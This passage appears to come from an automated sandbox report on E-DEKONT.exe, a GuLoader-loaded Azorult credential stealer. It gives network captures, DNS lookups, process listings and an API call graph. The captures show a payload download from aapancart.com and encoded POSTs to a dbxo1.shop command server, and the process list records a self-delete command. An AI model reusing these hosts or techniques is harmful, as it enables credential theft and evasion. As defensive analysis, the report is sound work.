                                                                          Nov 29, 2022 09:20:53.680021048 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:53.680109978 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:53.680118084 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:53.680125952 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:53.680133104 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:53.680166006 CET4985980192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:53.680210114 CET4985980192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:53.680262089 CET4985980192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:53.680452108 CET4985980192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:53.688786030 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:53.688899994 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:53.688910961 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:53.688918114 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:53.688925982 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:53.688936949 CET4985980192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:53.688985109 CET4985980192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:53.689011097 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:53.689133883 CET4985980192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:53.689153910 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:53.689163923 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:53.689172029 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:53.689223051 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:53.689304113 CET4985980192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:53.689352036 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:53.689359903 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:53.697587013 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:53.697750092 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:53.697871923 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:54.057970047 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:54.058010101 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:54.058260918 CET4985980192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:54.058435917 CET4985980192.168.11.20104.21.44.194
                                                                          Nov 29, 2022 09:20:54.067123890 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:54.278915882 CET8049859104.21.44.194192.168.11.20
                                                                          Nov 29, 2022 09:20:54.279221058 CET4985980192.168.11.20104.21.44.194
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 29, 2022 09:20:37.799755096 CET | 55511 | 53 | 192.168.11.20 | 1.1.1.1
Nov 29, 2022 09:20:37.816898108 CET | 53 | 55511 | 1.1.1.1 | 192.168.11.20
Nov 29, 2022 09:20:38.907119989 CET | 61249 | 53 | 192.168.11.20 | 1.1.1.1
Nov 29, 2022 09:20:38.931262970 CET | 53 | 61249 | 1.1.1.1 | 192.168.11.20
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 29, 2022 09:20:37.799755096 CET | 192.168.11.20 | 1.1.1.1 | 0xc840 | Standard query (0) | aapancart.com | A (IP address) | IN (0x0001) | false
Nov 29, 2022 09:20:38.907119989 CET | 192.168.11.20 | 1.1.1.1 | 0x96f | Standard query (0) | dbxo1.shop | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 29, 2022 09:20:37.816898108 CET | 1.1.1.1 | 192.168.11.20 | 0xc840 | No error (0) | aapancart.com | | 103.14.99.114 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 09:20:38.931262970 CET | 1.1.1.1 | 192.168.11.20 | 0x96f | No error (0) | dbxo1.shop | | 104.21.44.194 | A (IP address) | IN (0x0001) | false
Nov 29, 2022 09:20:38.931262970 CET | 1.1.1.1 | 192.168.11.20 | 0x96f | No error (0) | dbxo1.shop | | 172.67.203.65 | A (IP address) | IN (0x0001) | false
                                                                          • aapancart.com
                                                                          • dbxo1.shop
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.11.20 | 49851 | 103.14.99.114 | 443 | C:\Users\user\Desktop\E-DEKONT.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.11.20 | 49852 | 104.21.44.194 | 80 | C:\Users\user\Desktop\E-DEKONT.exe
Timestamp | kBytes transferred | Direction | Data
Nov 29, 2022 09:20:38.942379951 CET | 242 | OUT | POST /db1/index.php HTTP/1.1
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                                                                          Host: dbxo1.shop
                                                                          Content-Length: 103
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 00 00 00 41 70 9d 32 13 8b 30 60 8b 30 63 8b 30 6c 8b 30 67 8b 30 67 8b 31 11 8b 30 6c 8b 30 61 8b 30 64 8b 30 61 8b 30 6c 8b 30 65 8b 30 62 ef 26 67 ea 42 70 9d 35 70 9d 32 10 8b 30 64 8b 30 60 eb 45 70 9c 47 70 9d 34 70 9d 33 70 9d 36 13 ec 47 70 9d 31 11 8b 31 11 eb 46 16 8b 30 63 8b 30 6c 8b 30 63 eb 40
                                                                          Data Ascii: Ap20`0c0l0g0g10l0a0d0a0l0e0b&gBp5p20d0`EpGp4p3p6Gp11F0c0l0c@
Nov 29, 2022 09:20:40.337285042 CET | 250 | IN | HTTP/1.1 200 OK
                                                                          Date: Tue, 29 Nov 2022 08:20:40 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.6.37
                                                                          Vary: Accept-Encoding,User-Agent
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3N7uk%2F%2FvZzOgnjRSMTqj5c%2FCc%2FG113peqMCF%2BYkcZFuRRKmnwFlOaQbHub1rbE9MQ5druOO6ulqJbduj%2BhdRzFy2%2Fi5pOyduPb88SyrHmcq1lnoKdDCJVUIUae0S"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 7719ecdf69699048-FRA
                                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                          Data Ascii: 9RY.v+X:l*]uQye@,]23(B9u3Udt5W3{@5Ubg65Uccb.Zbpa9G^6#1hV7c-{ V!7_ue$20bcv:6RT/gKRV0cUU6Udy`f
                                                                          Nov 29, 2022 09:20:40.338057041 CET264INData Raw: 18 82 8a ca 5c 03 b9 72 6c 3f 1a a8 27 cf 90 ef 1d d9 06 18 74 c0 db fd 90 c5 38 d8 7d 40 38 1c 11 b0 e0 e8 1e 20 27 c4 75 61 dd df 0c 4b 60 f3 ab f6 2a 28 c6 57 10 48 39 23 86 b5 df 2e f1 35 56 d2 00 d4 0c ef 28 0c a1 56 fd 7a 0e 1e 03 9b f3 79
                                                                          Data Ascii: \rl?'t8}@8 'uaK`*(WH9#.5V(Vzyg0dg6)7UQp3.Re3x&{7l/De/BiGwT)2PgR4`Tf020{ia25W3{v2UVze!BrY?Q<[?P`e04


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                          2 | 192.168.11.20 | 49859 | 104.21.44.194 | 80 | C:\Users\user\Desktop\E-DEKONT.exe
                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                          Nov 29, 2022 09:20:53.671021938 CET | 4926 | OUT | POST /db1/index.php HTTP/1.1
                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
                                                                          Host: dbxo1.shop
                                                                          Content-Length: 41815
                                                                          Cache-Control: no-cache
                                                                          Nov 29, 2022 09:20:54.057970047 CET | 4970 | IN | HTTP/1.1 200 OK
                                                                          Date: Tue, 29 Nov 2022 08:20:54 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          X-Powered-By: PHP/5.6.37
                                                                          Vary: User-Agent
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=llFjsl3AEyfNkbRugNABAOGqOR5rIA19vhAyFtQKe5L8YzccyCxkjw%2Fllv0BjfYRxCeNUAEIhSlhyNf%2BmKdW8RdSs7h%2FqWyOEHkHMS60fJuPfRDz46JHon2ggYFG"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 7719ed3b78a05b44-FRA
                                                                          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                          Data Raw: 37 0d 0a 66 61 6c 73 65 4f 4b 0d 0a
                                                                          Data Ascii: 7falseOK
                                                                          Nov 29, 2022 09:20:54.058010101 CET | 4970 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                          0 | 192.168.11.20 | 49851 | 103.14.99.114 | 443 | C:\Users\user\Desktop\E-DEKONT.exe
                                                                          Timestamp | kBytes transferred | Direction | Data
                                                                          2022-11-29 08:20:38 UTC | 0 | OUT | GET /rufZpHlxPMyoMZPqPua74.rar HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                          Host: aapancart.com
                                                                          Cache-Control: no-cache
                                                                          2022-11-29 08:20:38 UTC | 0 | IN | HTTP/1.1 200 OK
                                                                          Date: Tue, 29 Nov 2022 08:20:35 GMT
                                                                          Server: Apache
                                                                          Last-Modified: Thu, 24 Nov 2022 21:47:56 GMT
                                                                          Accept-Ranges: bytes
                                                                          Content-Length: 114752
                                                                          Connection: close
                                                                          Content-Type: application/x-rar-compressed



                                                                          Target ID:1
                                                                          Start time:09:19:48
                                                                          Start date:29/11/2022
                                                                          Path:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          Imagebase:0x400000
                                                                          File size:325782 bytes
                                                                          MD5 hash:0AA36EB080CF7171CEC271B2CD4D2108
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.108852449339.0000000002B60000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:low

                                                                          Target ID:4
                                                                          Start time:09:20:14
                                                                          Start date:29/11/2022
                                                                          Path:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Users\user\Desktop\E-DEKONT.exe
                                                                          Imagebase:0x400000
                                                                          File size:325782 bytes
                                                                          MD5 hash:0AA36EB080CF7171CEC271B2CD4D2108
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000004.00000000.108599370042.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000004.00000002.109020742612.000000001D9E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Azorult_1, Description: Yara detected Azorult, Source: 00000004.00000002.109010127986.000000001D4D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.109023686722.000000001DF30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                          Reputation:low

                                                                          Target ID:5
                                                                          Start time:09:20:53
                                                                          Start date:29/11/2022
                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "E-DEKONT.exe
                                                                          Imagebase:0x4a0000
                                                                          File size:236544 bytes
                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          Target ID:6
                                                                          Start time:09:20:54
                                                                          Start date:29/11/2022
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff732460000
                                                                          File size:875008 bytes
                                                                          MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high

                                                                          Target ID:7
                                                                          Start time:09:20:54
                                                                          Start date:29/11/2022
                                                                          Path:C:\Windows\SysWOW64\timeout.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:C:\Windows\system32\timeout.exe 3
                                                                          Imagebase:0xba0000
                                                                          File size:25088 bytes
                                                                          MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate

                                                                            Execution Graph

                                                                            Execution Coverage:7.8%
                                                                            Dynamic/Decrypted Code Coverage:5.6%
                                                                            Signature Coverage:21.5%
                                                                            Total number of Nodes:1633
                                                                            Total number of Limit Nodes:58
GetDlgItem CreateThread CloseHandle 9698->9700 9703 405600 9698->9703 9700->9703 9701 4054b6 9708 4054bd GetClientRect GetSystemMetrics SendMessageW SendMessageW 9701->9708 9702 40562b 9706 40568b 9702->9706 9710 405665 ShowWindow 9702->9710 9711 40563f 9702->9711 9703->9702 9704 405650 9703->9704 9705 405617 ShowWindow ShowWindow 9703->9705 9707 40427e 8 API calls 9704->9707 9743 40424c SendMessageW 9705->9743 9706->9704 9717 405699 SendMessageW 9706->9717 9712 40565e 9707->9712 9715 40552b 9708->9715 9716 40550f SendMessageW SendMessageW 9708->9716 9713 405685 9710->9713 9714 405677 9710->9714 9718 4041f0 SendMessageW 9711->9718 9720 4041f0 SendMessageW 9713->9720 9719 4052e6 24 API calls 9714->9719 9721 405530 SendMessageW 9715->9721 9722 40553e 9715->9722 9716->9715 9717->9712 9723 4056b2 CreatePopupMenu 9717->9723 9718->9704 9719->9713 9720->9706 9721->9722 9725 404217 18 API calls 9722->9725 9724 4062a4 17 API calls 9723->9724 9726 4056c2 AppendMenuW 9724->9726 9727 40554e 9725->9727 9728 4056f2 TrackPopupMenu 9726->9728 9729 4056df GetWindowRect 9726->9729 9730 405557 ShowWindow 9727->9730 9731 40558b GetDlgItem SendMessageW 9727->9731 9728->9712 9732 40570d 9728->9732 9729->9728 9733 40557a 9730->9733 9734 40556d ShowWindow 9730->9734 9731->9712 9735 4055b2 SendMessageW SendMessageW 9731->9735 9736 405729 SendMessageW 9732->9736 9742 40424c SendMessageW 9733->9742 9734->9733 9735->9712 9736->9736 9737 405746 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 9736->9737 9739 40576b SendMessageW 9737->9739 9739->9739 9740 405794 GlobalUnlock SetClipboardData CloseClipboard 9739->9740 9740->9712 9741->9701 9742->9731 9743->9702 9744 2b64ad0 9745 2b6477e 9744->9745 9745->9744 9746 2b64be4 9745->9746 9748 2b71135 9745->9748 9750 2b7109f 9748->9750 9749 2b71149 GetPEB 9752 2b7115e 9749->9752 9750->9748 9750->9749 9751 2b71035 9750->9751 9751->9746 10134 40432b lstrcpynW lstrlenW 8985 40202c 8986 40203e 8985->8986 8996 4020f0 8985->8996 8987 402c37 17 API calls 
8986->8987 8989 402045 8987->8989 8988 401423 24 API calls 8994 40224a 8988->8994 8990 402c37 17 API calls 8989->8990 8991 40204e 8990->8991 8992 402064 LoadLibraryExW 8991->8992 8993 402056 GetModuleHandleW 8991->8993 8995 402075 8992->8995 8992->8996 8993->8992 8993->8995 9008 4066cb WideCharToMultiByte 8995->9008 8996->8988 8999 402086 9001 4020a5 8999->9001 9002 40208e 8999->9002 9000 4020bf 9003 4052e6 24 API calls 9000->9003 9011 10001759 9001->9011 9004 401423 24 API calls 9002->9004 9005 402096 9003->9005 9004->9005 9005->8994 9006 4020e2 FreeLibrary 9005->9006 9006->8994 9009 4066f5 GetProcAddress 9008->9009 9010 402080 9008->9010 9009->9010 9010->8999 9010->9000 9012 10001789 9011->9012 9053 10001b18 9012->9053 9014 10001790 9015 100018a6 9014->9015 9016 100017a1 9014->9016 9017 100017a8 9014->9017 9015->9005 9101 10002286 9016->9101 9085 100022d0 9017->9085 9022 1000180c 9026 10001812 9022->9026 9027 1000184e 9022->9027 9023 100017ee 9114 100024a4 9023->9114 9024 100017d7 9036 100017cd 9024->9036 9111 10002b57 9024->9111 9025 100017be 9029 100017c4 9025->9029 9035 100017cf 9025->9035 9031 100015b4 3 API calls 9026->9031 9033 100024a4 10 API calls 9027->9033 9029->9036 9095 1000289c 9029->9095 9038 10001828 9031->9038 9039 10001840 9033->9039 9034 100017f4 9125 100015b4 9034->9125 9105 10002640 9035->9105 9036->9022 9036->9023 9043 100024a4 10 API calls 9038->9043 9045 10001895 9039->9045 9136 10002467 9039->9136 9042 100017d5 9042->9036 9043->9039 9045->9015 9047 1000189f GlobalFree 9045->9047 9047->9015 9050 10001881 9050->9045 9140 1000153d wsprintfW 9050->9140 9051 1000187a FreeLibrary 9051->9050 9143 1000121b GlobalAlloc 9053->9143 9055 10001b3c 9144 1000121b GlobalAlloc 9055->9144 9057 10001d7a GlobalFree GlobalFree GlobalFree 9058 10001d97 9057->9058 9072 10001de1 9057->9072 9059 100020ee 9058->9059 9067 10001dac 9058->9067 9058->9072 9061 10002110 GetModuleHandleW 9059->9061 9059->9072 9060 10001c1d GlobalAlloc 9082 10001b47 9060->9082 9062 
10002121 LoadLibraryW 9061->9062 9063 10002136 9061->9063 9062->9063 9062->9072 9151 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 9063->9151 9064 10001c68 lstrcpyW 9068 10001c72 lstrcpyW 9064->9068 9065 10001c86 GlobalFree 9065->9082 9067->9072 9147 1000122c 9067->9147 9068->9082 9069 10002188 9071 10002195 lstrlenW 9069->9071 9069->9072 9152 100015ff WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 9071->9152 9072->9014 9073 10002148 9073->9069 9084 10002172 GetProcAddress 9073->9084 9074 10002048 9074->9072 9077 10002090 lstrcpyW 9074->9077 9077->9072 9078 10001cc4 9078->9082 9145 1000158f GlobalSize GlobalAlloc 9078->9145 9079 10001f37 GlobalFree 9079->9082 9080 100021af 9080->9072 9082->9057 9082->9060 9082->9064 9082->9065 9082->9068 9082->9072 9082->9074 9082->9078 9082->9079 9083 1000122c 2 API calls 9082->9083 9150 1000121b GlobalAlloc 9082->9150 9083->9082 9084->9069 9093 100022e8 9085->9093 9087 10002410 GlobalFree 9090 100017ae 9087->9090 9087->9093 9088 100023ba GlobalAlloc CLSIDFromString 9088->9087 9089 1000238f GlobalAlloc WideCharToMultiByte 9089->9087 9090->9024 9090->9025 9090->9036 9091 1000122c GlobalAlloc lstrcpynW 9091->9093 9092 100023d9 9092->9087 9158 100025d4 9092->9158 9093->9087 9093->9088 9093->9089 9093->9091 9093->9092 9154 100012ba 9093->9154 9097 100028ae 9095->9097 9096 10002953 SetFilePointer 9098 10002971 9096->9098 9097->9096 9099 10002a62 GetLastError 9098->9099 9100 10002a6d 9098->9100 9099->9100 9100->9036 9102 10002296 9101->9102 9103 100017a7 9101->9103 9102->9103 9104 100022a8 GlobalAlloc 9102->9104 9103->9017 9104->9102 9108 1000265c 9105->9108 9106 100026c0 9109 100026cf 9106->9109 9110 100026c5 GlobalSize 9106->9110 9107 100026ad GlobalAlloc 9107->9109 9108->9106 9108->9107 9109->9042 9110->9109 9113 10002b62 9111->9113 9112 10002ba2 GlobalFree 9113->9112 9161 1000121b GlobalAlloc 9114->9161 9116 10002506 MultiByteToWideChar 9119 100024ae 9116->9119 
9117 1000252b StringFromGUID2 9117->9119 9118 1000253c lstrcpynW 9118->9119 9119->9116 9119->9117 9119->9118 9120 1000254f wsprintfW 9119->9120 9121 1000256c GlobalFree 9119->9121 9122 100025a7 GlobalFree 9119->9122 9123 10001272 2 API calls 9119->9123 9162 100012e1 9119->9162 9120->9119 9121->9119 9122->9034 9123->9119 9166 1000121b GlobalAlloc 9125->9166 9127 100015ba 9128 100015c7 lstrcpyW 9127->9128 9130 100015e1 9127->9130 9131 100015fb 9128->9131 9130->9131 9132 100015e6 wsprintfW 9130->9132 9133 10001272 9131->9133 9132->9131 9134 100012b5 GlobalFree 9133->9134 9135 1000127b GlobalAlloc lstrcpynW 9133->9135 9134->9039 9135->9134 9137 10001861 9136->9137 9138 10002475 9136->9138 9137->9050 9137->9051 9138->9137 9139 10002491 GlobalFree 9138->9139 9139->9138 9141 10001272 2 API calls 9140->9141 9142 1000155e 9141->9142 9142->9045 9143->9055 9144->9082 9146 100015ad 9145->9146 9146->9078 9153 1000121b GlobalAlloc 9147->9153 9149 1000123b lstrcpynW 9149->9072 9150->9082 9151->9073 9152->9080 9153->9149 9155 100012c1 9154->9155 9156 1000122c 2 API calls 9155->9156 9157 100012df 9156->9157 9157->9093 9159 100025e2 VirtualAlloc 9158->9159 9160 10002638 9158->9160 9159->9160 9160->9092 9161->9119 9163 100012ea 9162->9163 9164 1000130c 9162->9164 9163->9164 9165 100012f0 lstrcpyW 9163->9165 9164->9119 9165->9164 9166->9127 9753 2b676d9 9754 2b67789 9753->9754 9755 2b86193 K32EnumDeviceDrivers 9754->9755 9756 2b67796 9755->9756 9757 2b86193 K32EnumDeviceDrivers 9756->9757 9758 2b677b8 9757->9758 9759 402a2f 9760 402c15 17 API calls 9759->9760 9761 402a35 9760->9761 9762 402a47 9761->9762 9763 402a6c 9761->9763 9764 402885 9761->9764 9762->9764 9767 4061c9 wsprintfW 9762->9767 9763->9764 9765 4062a4 17 API calls 9763->9765 9765->9764 9767->9764 9768 401a30 9769 402c37 17 API calls 9768->9769 9770 401a39 ExpandEnvironmentStringsW 9769->9770 9771 401a60 9770->9771 9772 401a4d 9770->9772 9772->9771 9773 401a52 lstrcmpW 9772->9773 9773->9771 9774 402835 9775 40283d 
9774->9775 9776 402841 FindNextFileW 9775->9776 9777 402853 9775->9777 9776->9777 9778 4029e0 9777->9778 9780 406282 lstrcpynW 9777->9780 9780->9778 10135 401735 10136 402c37 17 API calls 10135->10136 10137 40173c SearchPathW 10136->10137 10138 4029e0 10137->10138 10139 401757 10137->10139 10139->10138 10141 406282 lstrcpynW 10139->10141 10141->10138 9781 10002a77 9782 10002a8f 9781->9782 9783 1000158f 2 API calls 9782->9783 9784 10002aaa 9783->9784 9789 404a3c 9790 404a68 9789->9790 9791 404a4c 9789->9791 9792 404a9b 9790->9792 9793 404a6e SHGetPathFromIDListW 9790->9793 9800 4058c8 GetDlgItemTextW 9791->9800 9795 404a85 SendMessageW 9793->9795 9796 404a7e 9793->9796 9795->9792 9798 40140b 2 API calls 9796->9798 9797 404a59 SendMessageW 9797->9790 9798->9795 9800->9797 9474 403d3e 9475 403e91 9474->9475 9476 403d56 9474->9476 9478 403ea2 GetDlgItem GetDlgItem 9475->9478 9479 403ee2 9475->9479 9476->9475 9477 403d62 9476->9477 9481 403d80 9477->9481 9482 403d6d SetWindowPos 9477->9482 9483 404217 18 API calls 9478->9483 9480 403f3c 9479->9480 9491 401389 2 API calls 9479->9491 9485 404263 SendMessageW 9480->9485 9507 403e8c 9480->9507 9486 403d85 ShowWindow 9481->9486 9487 403d9d 9481->9487 9482->9481 9484 403ecc SetClassLongW 9483->9484 9488 40140b 2 API calls 9484->9488 9502 403f4e 9485->9502 9486->9487 9489 403da5 DestroyWindow 9487->9489 9490 403dbf 9487->9490 9488->9479 9492 4041c1 9489->9492 9493 403dc4 SetWindowLongW 9490->9493 9494 403dd5 9490->9494 9495 403f14 9491->9495 9501 4041d1 ShowWindow 9492->9501 9492->9507 9493->9507 9497 403de1 GetDlgItem 9494->9497 9498 403e7e 9494->9498 9495->9480 9499 403f18 SendMessageW 9495->9499 9496 4041a2 DestroyWindow EndDialog 9496->9492 9503 403e11 9497->9503 9504 403df4 SendMessageW IsWindowEnabled 9497->9504 9505 40427e 8 API calls 9498->9505 9499->9507 9500 40140b 2 API calls 9500->9502 9501->9507 9502->9496 9502->9500 9506 4062a4 17 API calls 9502->9506 9502->9507 9510 404217 18 API calls 9502->9510 9520 404217 18 
API calls 9502->9520 9536 4040e2 DestroyWindow 9502->9536 9508 403e1e 9503->9508 9511 403e65 SendMessageW 9503->9511 9512 403e31 9503->9512 9518 403e16 9503->9518 9504->9503 9504->9507 9505->9507 9506->9502 9508->9511 9508->9518 9510->9502 9511->9498 9514 403e39 9512->9514 9515 403e4e 9512->9515 9513 403e4c 9513->9498 9517 40140b 2 API calls 9514->9517 9516 40140b 2 API calls 9515->9516 9519 403e55 9516->9519 9517->9518 9549 4041f0 9518->9549 9519->9498 9519->9518 9521 403fc9 GetDlgItem 9520->9521 9522 403fe6 ShowWindow KiUserCallbackDispatcher 9521->9522 9523 403fde 9521->9523 9546 404239 EnableWindow 9522->9546 9523->9522 9525 404010 EnableWindow 9530 404024 9525->9530 9526 404029 GetSystemMenu EnableMenuItem SendMessageW 9527 404059 SendMessageW 9526->9527 9526->9530 9527->9530 9529 403d1f 18 API calls 9529->9530 9530->9526 9530->9529 9547 40424c SendMessageW 9530->9547 9548 406282 lstrcpynW 9530->9548 9532 404088 lstrlenW 9533 4062a4 17 API calls 9532->9533 9534 40409e SetWindowTextW 9533->9534 9535 401389 2 API calls 9534->9535 9535->9502 9536->9492 9537 4040fc CreateDialogParamW 9536->9537 9537->9492 9538 40412f 9537->9538 9539 404217 18 API calls 9538->9539 9540 40413a GetDlgItem GetWindowRect ScreenToClient SetWindowPos 9539->9540 9541 401389 2 API calls 9540->9541 9542 404180 9541->9542 9542->9507 9543 404188 ShowWindow 9542->9543 9544 404263 SendMessageW 9543->9544 9545 4041a0 9544->9545 9545->9492 9546->9525 9547->9530 9548->9532 9550 4041f7 9549->9550 9551 4041fd SendMessageW 9549->9551 9550->9551 9551->9513 8590 4015c1 8591 402c37 17 API calls 8590->8591 8592 4015c8 8591->8592 8593 405bfe 4 API calls 8592->8593 8606 4015d1 8593->8606 8594 401631 8596 401663 8594->8596 8597 401636 8594->8597 8595 405b80 CharNextW 8595->8606 8600 401423 24 API calls 8596->8600 8617 401423 8597->8617 8605 40165b 8600->8605 8604 40164a SetCurrentDirectoryW 8604->8605 8606->8594 8606->8595 8607 401617 GetFileAttributesW 8606->8607 8609 40584f 8606->8609 8612 4057b5 
CreateDirectoryW 8606->8612 8621 405832 CreateDirectoryW 8606->8621 8607->8606 8624 40665c GetModuleHandleA 8609->8624 8613 405802 8612->8613 8614 405806 GetLastError 8612->8614 8613->8606 8614->8613 8615 405815 SetFileSecurityW 8614->8615 8615->8613 8616 40582b GetLastError 8615->8616 8616->8613 8618 4052e6 24 API calls 8617->8618 8619 401431 8618->8619 8620 406282 lstrcpynW 8619->8620 8620->8604 8622 405842 8621->8622 8623 405846 GetLastError 8621->8623 8622->8606 8623->8622 8625 406682 GetProcAddress 8624->8625 8626 406678 8624->8626 8627 405856 8625->8627 8630 4065ec GetSystemDirectoryW 8626->8630 8627->8606 8629 40667e 8629->8625 8629->8627 8631 40660e wsprintfW LoadLibraryExW 8630->8631 8631->8629 9804 4016cc 9805 402c37 17 API calls 9804->9805 9806 4016d2 GetFullPathNameW 9805->9806 9807 40170e 9806->9807 9808 4016ec 9806->9808 9809 401723 GetShortPathNameW 9807->9809 9810 402abf 9807->9810 9808->9807 9811 4065c5 2 API calls 9808->9811 9809->9810 9812 4016fe 9811->9812 9812->9807 9814 406282 lstrcpynW 9812->9814 9814->9807 8739 4014d7 8740 402c15 17 API calls 8739->8740 8741 4014dd Sleep 8740->8741 8743 402abf 8741->8743 9815 4022d7 9816 4022de 9815->9816 9819 4022f1 9815->9819 9817 4062a4 17 API calls 9816->9817 9818 4022eb 9817->9818 9818->9819 9820 4058e4 MessageBoxIndirectW 9818->9820 9820->9819 10148 402dd7 10149 402e02 10148->10149 10150 402de9 SetTimer 10148->10150 10151 402e57 10149->10151 10152 402e1c MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 10149->10152 10150->10149 10152->10151 10153 2b64721 10155 2b6475c 10153->10155 10154 2b647e3 10155->10154 10156 2b71135 GetPEB 10155->10156 10156->10154 8831 4023de 8832 402c37 17 API calls 